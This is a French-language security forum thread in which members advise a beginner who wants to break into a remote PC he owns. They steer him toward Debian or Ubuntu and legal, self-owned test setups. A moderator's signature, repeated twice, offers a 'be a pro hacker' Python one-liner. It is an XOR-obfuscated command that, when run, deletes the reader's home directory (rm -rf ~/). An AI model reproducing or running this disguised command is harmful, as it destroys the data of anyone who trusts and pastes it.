Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 01-07-2013 11:56:03

Xav-G
Nouveau membre

pentest en externe

salut a tous

pour me presenter rapidement
avant je m'amusais à écrire des programmes (bot :p) sous visual basic 6 qui devaient jouer à ma place pendant mes heures de cours :p
je ne les ai jamais vraiment utilisés puisque les jeux perdent tout interet quand on triche xD
c'etais des challenges bien simpatique où le plus amusant etais de ce casser la tête.

depuis peu j'ai décider d'apprendre quelque truc sur la securité informatique.
et franchement je nage, ca n'a plus rien a voir avec mes programmes que j'ecrivais hmm

du coup j'ai trouver votre forum assez poussé dans ce domaine. je vien donc vous embeter un peu smile

j'ai deux ordinateurs sur deux reseau séparé.
un chez moi et un chez mon pere.
celui qui est chez moi, je suis devant, donc ca va :p
celui chez mon père, est allumé et démare avec teamviewer, je peux donc me connecter dessu. (quand je veux)

se que je voudrais faire c'est prendre la main sur le pc chez mon père comme le ferais un mechant (donc sans teamviewer)

quand je lis les tuto je tombe toujours sur des essais en reseau interne.
ou il faut cracker la cles wep puis trouver une faille sur un pc de ce reseau

se qui ne me conserne pas trop hmm
j'aimerais donc parler un peu quant aux possibilitées de trouver une faille sur un pc distant.
j'aimerais bien utiliser backtrack 5 r3 puisque cela ma l'aire tres complet. (alors autant m'y familliariser tout de suite)

mais je pense que pour penetre un pc distant le seul moyen est d'utiliser un trojan non?

Dernière modification par Xav-G (01-07-2013 12:28:31)

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 01-07-2013 13:00:15

Anoname
Membre Radioactif
Lieu : AnoNation

Re : pentest en externe

Bonjour jeune Lamer.
Tu n'es pas le bienvenu sur ce forum, tu vas être banni, ici on n'utilise pas de trojan & on ne pénêtre pas des PC's.
On veut juste protéger nos réseaux WiFi des gens comme toi, Bye.
Vu que l'admin va passé par là : Ils te font perdre du temps souvent ? Ca fait la deuxième fois en 2 jours --'
Tcho !

Je suis boulet
Toutes mes escuses à toi Xav-G & Welcome !

Dernière modification par Anoname (03-07-2013 18:16:05)

668999bannerfinal.jpg

#3 01-07-2013 13:08:48

spawn
Modérateur

Bienvenue Xav-G.

Si tu veux apprendre des choses, tu as trouvé un des bons endroits.
Tu n'apprendras rien de malsain ici, on ne veut pas envoyer les débutants en prison.

Fais attention, nos règles sont strictes quand à ce que l'on fait de son savoir.
Il est d'usage de ne dire ici que ce que l'on fait de légal. Le reste n'a pas sa place.

Tu n'as pas besoin de backtrack pour découvrir la sécurité informatique, installe toi plutôt une ubuntu, tu auras l'air moins ignorant, et tu pourras installer seulement ce dont tu as besoin.

Backtrack c'est pour les rigolos.

Un pc derrière une box d'un FAI français ne craint rien à distance.
Il faut impérativement que tu y déposes un éxécutable malveillant pour le pénétrer.

Anoname, tu surinterprète ce que Xav-G dit. C'est superflu et désagréable.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#4 01-07-2013 13:58:30

Xav-G
Nouveau membre

merci spawn pour ta reponse

j'ai deja utilisé ubuntu j'ai pas telement accroché.
du coup je me suis tourné vers backtrack sous Vbox, en me disant que je m'en servirais uniquement quand je voudrais faire des essayes.
et le fait que ce soit uniquement avec des commandes ca me parle deja un peu mieux.

Backtrack c'est pour les rigolos.

du coup je me demande pourquoi? c'est parceque tout y est pré installer?

#5 01-07-2013 16:14:23

koala
Membre d'honneur
Lieu : In the sky

Backtrack c'est un happy meal bien gras et dégoulinant, c'est bien si tu veux faire des tests pousser (quoi que sur une autre version de linux...)

Sur une version de linux basic c'est mieux si tu veux débuter et tu peux trier et faire seulement ce que ta besoin wink

@anoname

Je trouve ton agressivité mal placée.

#6 01-07-2013 17:06:13

Xav-G
Nouveau membre

je suis venu cherche des conseils alors je vais pas vous contre dire ^^
je vais remettre ubuntu :p

#7 01-07-2013 17:58:31

AndroGeek974
Membre Hyperactif

Salut Xav-G,

Moi aussi je te conseille de remettre Ubuntu, ensuite tu installes les programmes dont tu as besoins, comme ça tu éviteras de te perdre dans des programmes de BT que tu n'utiliseras jamais smile.

Ubuntu 12.10 with Gnome 3.
Linux un jour, Linux toujours ♥

#8 01-07-2013 21:43:06

Xav-G
Nouveau membre

ouep vous avez raison
merci

j'aurai pensé que BT etais une bonne idée vue qu'il me semble plus simple de trouver des tuto

#9 02-07-2013 03:16:00

warfares
Membre Hyperactif

peut être HS à la vue du titre, mais vu le tournant de la discussion, je ne peut que te conseiller backbox, c'ets une ubuntu 12.04, avec certains outils de pentest, beaucoup moins que backtrack, mais il ya les "fondamentaux" pour je pense "comprendre" les réseaux wifi ( la suite aircrack etc ...), le contrôle a distance ( metasploit , SET etc ... ), geany, que j'ai découvert grâce a cette distro, qui se révèle être un IDE ( je ne l'utilise pour le momen,t que pour le web ) très agréable !
De plus, xface est très agréable, tu as des scripts pour les mises à jour eux aussi agréables, et une GUI pour le firewall ( comme dis plus haut derrière une box francais tu ne risques rien, mais sur un wifi libre ...) .
De plus , cette distribution ne t'encourage pas à être full root, ce qui est un bon réflexe à prendre, surtout en GUI.
et pour finir, sur leur site, il y à pas mal de tuto pour personnaliser ton environnement , et l'équipe semble assez présente.
Par exemple il y à un tuto très détaillé pour faire une installation chifrée, ce qui je pense, est aussi un bon réflexe à prendre.

pour ce qui est de ta question initiale, je pense que cela a été répété maintes fois, mais vu que les réseaux t'appartiennent ( ou à ton père, ) cherche du coté du port forwarding, mais du coup fait cela en connaissance de cause, car tu exposes ton "pc victime" aux "vrais méchants".
sinon il y à les reverse_XXXX mais du coup tu expose ton pc serveur, ce qui je pense, est mon préférable.

Dernière modification par warfares (02-07-2013 03:32:32)

#10 02-07-2013 08:43:12

Xav-G
Nouveau membre

c'est pas trés grave si on déborde un peu ca m'interresse quand même.

pour se qui est des mises en garde, même sans aller jusqu'au fait.
comprendre le fonctionnement me semble très interressant.

#11 02-07-2013 17:54:09

warfares
Membre Hyperactif

un bon site pour démarer http://frameip.com/
et sinon des tutos/cours sur TCP/IP pour commencer, afin de comprendre les notions de ports, adreese ip (locale / publique ).

#12 24-11-2013 03:31:08

pant
Membre

pour ma part je pourrais te conseiller fedora et pourquoi tu ne te créer par un réseaux pour testé tes connaissance  avec pfsense c'est facile de le faire et tu Télécharge quelques vm

#13 24-11-2013 10:44:50

spawn
Modérateur

Backtrack n'est pas vraiment pour les rigolos.

Les rigolos sont ceux qui l'installent en dur sur leur pc alors qu'ils ne sont pas professionnels.
Si c'est pour essayer de jouer avec des outils, il vaut mieux avoir une gentille debian bien faite sur laquelle on installe et désinstalle tel ou tel outil.

Backtrack est utile quand on s'en sert, et dangereuse (~instable) quand on considère que c'est un OS quotidien.
Coyotus a publié des one-liners pour changer un octet dans les éxécutables de vlc par exemple et pouvoir les lancer en root.
Il est donc possible de truquer des trucs sur backtrack où on est toujours fucking root.

La première erreur que vous ferez, la première faille que vous aurez laissée qui sera exploitée par votre pote au n'importe qui d'autre lui donnera DIRECTEMENT le fucking root access.
Vous réalisez que vous avez un FIREFOX ROOT ?

Cela dit, le noyau de backtrack et sa préparation ont ça de bien que l'injection fonctionne du premier coup, qu'on a les droits pour faire plein de trucs. C'est pour cela qu'elle est bien quand on la démarre ne live (ou pas d'ailleurs) de temps en temps.

Aussi, je vous conseille une fois de plus une gentille debian. smile
(Merci de me pardonner mes premières grossièretés sur ce forum)

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#14 24-11-2013 11:14:27

coyotus
Membre Irremplaçable
Lieu : fort fort lointain

Perso j'ai installé Kali en dur sur une machine dédié au test, comme j'ai plusieur PC je peux bien en utiliser une pour, mais il est exact que dans mon usage quotidien, j'utilise Archlinux et Debian.

Maintenant, j'ai posté l'astuce pour répondre à une demande récurrente et je ne suis pas responsable de l'usage qu'est fait de mes tutoriel.

Je fais mes test, je poste le résultat de ceux-ci et parfois les souci rencontré et comment je les ai résolu.

Personnellement, je ne suis pas un professionnel de la sécurité informatique (loin de là) mais je suis over curieux, c'est maladif chez moi, c'est mon coté enfant qui est resté.

J'utilise pour mes test principalement une VM avec snapchot pour revenir à l'état initial afin de tester l'installation des outils sur une installation propre.
Une installation en dur pour les test sur l'utilisation des outils pré-installé, de certain outil que j'utilise personnellement, et en  déplacement pour présentation.
J'utilise également un réseau virtuel pour mes test simulé.
Et enfin j'ai plusieurs point d'accès que j'ai acheté car je ne fait jamais de test sur un réseau ne m'appartenant pas et je possèdes plusieurs vielles machines sous Windows/Linux pour ces même test.

Mais chacun son usage de la chose.

1310812721.gif

#15 24-11-2013 15:14:51

kcdtv
Membre d'honneur
Lieu : Internacionaluña

J'utilise kali installé en dur comme SO unique sans être un profesionnel, concrètement pour faire mumuse avec tous les tools qu'il y a. big_smile

Après il s'agit de respecter les règles de bases, la première chose à faire après instalation étant se faire un compte courant et normal et "sudoer" quand on veut "rooter", ce qui se fait par défaut dans les distributions "grand public" pendant l'instalation même.

Annonce